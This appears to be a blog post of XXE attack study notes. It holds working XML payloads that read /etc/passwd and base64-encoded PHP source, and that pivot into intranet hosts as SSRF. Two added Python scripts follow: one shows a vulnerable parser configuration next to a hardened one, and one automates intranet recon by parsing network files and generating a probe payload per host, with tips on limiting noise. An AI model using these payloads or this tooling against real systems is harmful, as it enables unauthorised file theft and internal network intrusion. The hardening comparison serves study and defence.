XXE Study Notes

Published 2020-11-16  1239 views


Updated whenever I get around to it~ mainly a record of the XXE attack methods I've run into.

XXE with echoed output (in-band)

<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/passwd">]
>
<user><username>&name;</username><password>1</password></user>
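The payload above only works because the server-side parser resolves the SYSTEM entity and then echoes the element it was spliced into. As an added example (not code from the original post), here is the same attack reproduced against Python's xml.sax, which can be switched between the vulnerable and the hardened behaviour with one feature flag. The "passwd" file and its contents are constructed stand-ins for /etc/passwd; the payload shape is the one from the post.

```python
"""In-band XXE against xml.sax: vulnerable vs. hardened parser configuration.

Added example, not part of the original post.  The secret file is a
constructed stand-in for /etc/passwd.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


def build_payload(uri: str) -> bytes:
    """Same shape as the post's payload: a SYSTEM entity pointing at `uri`,
    referenced inside <username> so the server echoes the fetched bytes."""
    return (
        '<?xml version="1.0" ?>\n'
        '<!DOCTYPE a [\n'
        f'<!ENTITY name SYSTEM "{uri}">\n'
        ']>\n'
        '<user><username>&name;</username><password>1</password></user>\n'
    ).encode()


class _UserHandler(xml.sax.ContentHandler):
    """Collects the text of <username>, the way a login handler would."""

    def __init__(self):
        super().__init__()
        self.username = []
        self._in_username = False

    def startElement(self, name, attrs):
        self._in_username = name == "username"

    def endElement(self, name):
        if name == "username":
            self._in_username = False

    def characters(self, content):
        if self._in_username:
            self.username.append(content)


def read_username(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse a request body and return the username text.

    resolve_external_entities=True is the vulnerable configuration: xml.sax
    opens whatever the SYSTEM identifier points at (file://, http://) and
    splices the bytes into the document.  False (the default in current
    Python releases) leaves &name; empty, which is the hardened behaviour.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = _UserHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.username)


def demo() -> tuple:
    """Write a constructed passwd-like file, then read it through both
    parser configurations.  Returns (leaked_text, hardened_text)."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "passwd")
        with open(secret, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed content
        payload = build_payload("file://" + secret)
        leaked = read_username(payload, resolve_external_entities=True)
        safe = read_username(payload, resolve_external_entities=False)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser echoed:", repr(leaked))
    print("hardened parser echoed:  ", repr(safe))
```

The hardened run returns an empty username rather than an error, which is exactly why this bug is easy to miss in testing: nothing looks broken from the application's side, the only difference is whether the file contents come back.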

Reading source code with XXE

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
 ]>
<user><username>&file;</username><password>456</password></user>

Base64-decode the echoed value to get the source. The php://filter wrapper is needed because raw PHP source contains <?php, quotes and other characters that would make the entity ill-formed XML and abort the parse; base64 turns it into plain text the parser passes through untouched.

Using XXE to attack the intranet

XXE can be used as SSRF into the intranet. First read a few files that reveal intranet addresses: /etc/hosts, /proc/net/arp and /proc/net/fib_trie.

<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/hosts">]
>
<user><username>&name;</username><password>1</password></user>

Then access the discovered IP addresses over the http protocol:

<?xml version="1.0"?>
<!DOCTYPE dy [
<!ENTITY dy SYSTEM "http://10.159.187.11">
]>
<user><username>&dy;</username><password>123</password></user>

You can also fetch the target through php://filter, which gets around the echo problem: an HTML or binary response is not well-formed XML and makes the parser fail on the entity, whereas the base64-wrapped body is plain text that comes back intact. This variant needs a PHP target with allow_url_fopen enabled.

<?xml version="1.0"?>
<!DOCTYPE dy [
<!ENTITY dy SYSTEM "php://filter/read=convert.base64-encode/resource=http://10.159.187.11">
]>
<user><username>&dy;</username><password>123</password></user>
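The three recon steps above (read the network files, pick out addresses, probe them over HTTP and decode the reply) are worth scripting once. The following is an added example, not code from the original post: it parses constructed samples of /etc/hosts, /proc/net/arp and /proc/net/fib_trie in their real formats, builds the post's HTTP probe payload for each candidate (plain and php://filter base64-wrapped), and pulls the echoed field back out of a reply. The reply format (a <result><username> element) is an assumption, since the post does not show what the server returns.

```python
"""XXE-as-SSRF recon helper.  Added example, not part of the original post.
All file contents and the server reply below are constructed samples."""
import base64
import ipaddress
import re
import xml.etree.ElementTree as ET

ETC_HOSTS = """127.0.0.1 localhost
::1 localhost ip6-localhost
10.159.187.11 web01 web01.corp   # constructed
10.159.187.12 db01
"""

PROC_NET_ARP = """IP address       HW type     Flags       HW address            Mask     Device
10.159.187.1     0x1         0x2         00:50:56:c0:00:08     *        eth0
10.159.187.20    0x1         0x2         00:0c:29:3a:1b:2c     *        eth0
"""

# Main table only; the real file also repeats entries under "Local:".
PROC_NET_FIB_TRIE = """Main:
  +-- 0.0.0.0/0 3 0 5
     |-- 0.0.0.0
        /0 universe UNICAST
     +-- 10.159.187.0/24 2 0 2
        |-- 10.159.187.0
           /32 link BROADCAST
        |-- 10.159.187.11
           /32 host LOCAL
        |-- 10.159.187.255
           /32 link BROADCAST
     +-- 127.0.0.0/8 2 0 2
        |-- 127.0.0.1
           /32 host LOCAL
"""


def _usable(ip: str) -> bool:
    """Keep RFC1918-style IPv4 addresses; drop loopback, 0.0.0.0 and IPv6."""
    try:
        addr = ipaddress.IPv4Address(ip)
    except ValueError:
        return False
    return addr.is_private and not addr.is_loopback and not addr.is_unspecified


def hosts_from_etc_hosts(text: str) -> set:
    out = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # strip comments
        if line and _usable(line.split()[0]):
            out.add(line.split()[0])
    return out


def hosts_from_proc_arp(text: str) -> set:
    """Neighbours the box has actually talked to; flags 0x0 = incomplete."""
    out = set()
    for line in text.splitlines()[1:]:        # first line is the header
        f = line.split()
        if len(f) >= 4 and f[2] != "0x0" and _usable(f[0]):
            out.add(f[0])
    return out


def fib_trie_local_and_networks(text: str) -> tuple:
    """'/32 host LOCAL' leaves are this machine's own addresses;
    '+-- a.b.c.d/n' nodes with 0 < n < 32 are the attached subnets to scan."""
    local, nets = set(), set()
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.search(r"\+-- (\d+\.\d+\.\d+\.\d+)/(\d+)", line)
        if m and 0 < int(m.group(2)) < 32:
            net = ipaddress.IPv4Network(f"{m.group(1)}/{m.group(2)}", strict=False)
            if net.is_private and not net.is_loopback:
                nets.add(str(net))
        m = re.search(r"\|-- (\d+\.\d+\.\d+\.\d+)", line)
        if m and i + 1 < len(lines) and "host LOCAL" in lines[i + 1] and _usable(m.group(1)):
            local.add(m.group(1))
    return local, nets


def http_payload(ip: str, via_filter: bool = False) -> str:
    """The post's HTTP probe.  via_filter=True wraps the fetch in php://filter
    so an HTML/binary body is base64 text and does not break the XML parser
    on the way back (PHP target with allow_url_fopen required)."""
    target = f"http://{ip}"
    if via_filter:
        target = f"php://filter/read=convert.base64-encode/resource={target}"
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE dy [\n'
        f'<!ENTITY dy SYSTEM "{target}">\n'
        ']>\n'
        '<user><username>&dy;</username><password>123</password></user>\n'
    )


def decode_echo(response_xml: str, via_filter: bool = False) -> str:
    """Pull the echoed <username> out of the reply (assumed <result> wrapper)
    and undo the base64 wrapping when the php://filter variant was used."""
    text = ET.fromstring(response_xml).findtext("username") or ""
    return base64.b64decode(text).decode("utf-8", "replace") if via_filter else text


def candidates() -> set:
    """Union of every address the three files gave us, minus our own IPs."""
    local, _nets = fib_trie_local_and_networks(PROC_NET_FIB_TRIE)
    found = hosts_from_etc_hosts(ETC_HOSTS) | hosts_from_proc_arp(PROC_NET_ARP)
    return found - local


if __name__ == "__main__":
    for ip in sorted(candidates()):
        print(http_payload(ip, via_filter=True))
```

Use the "nets" half of fib_trie_local_and_networks to sweep a whole /24 only after the listed hosts have been tried: every probe is one XXE request through the victim, and a 254-address sweep is noisy.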


I do not know where to go, but I have been on the road.